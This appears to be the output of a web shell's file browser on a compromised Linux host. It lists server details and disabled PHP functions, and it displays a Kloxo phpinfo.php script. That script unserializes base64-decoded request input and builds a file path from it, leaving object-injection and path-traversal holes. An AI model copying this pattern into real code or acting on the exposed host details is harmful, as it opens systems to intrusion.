HEX
Server: Apache/2.4.58 (IUS)
System: Linux fromcolo1.linveo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: u100898694 (7904)
PHP: 8.1.29
Disabled: symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshellarg,escapeshellcmd,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,apache_child_terminate,apache_setenv,define_syslog_variables,highlight_file,ini_get_all,ini_restore,inject_code,openlog,posix_getpwuid,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,posix_setuid,posix_uname,syslog,system,show_source,pcntl_exec,virtual,suexec,dbmopen,dl,disk_free_space,diskfreespace,leak,apache_get_modules,apache_get_version,apache_note,apache_setenv,highlight_file
$ pwd: /home/u100898694/kloxoscript/
Upload Files
File: /home/u100898694/kloxoscript/phpinfo.php
<?php 
main();

function main()
{
	$v = $_REQUEST['session'];

	$v = unserialize(base64_decode($v));

	$r = unserialize(file_get_contents("/home/kloxo/httpd/script/sess_{$v['session']}"));

	if ($r['ip_address'] !== $_SERVER['REMOTE_ADDR']) {
		print("No Session. You can access this only through kloxo and needs proper authentication. " .
			"If you are indeed accessing from Inside Kloxo, then please logout and login again, " .
			"so that a new session is created properly.\n");

		exit;
	} 

	phpinfo();
}
@ Telegram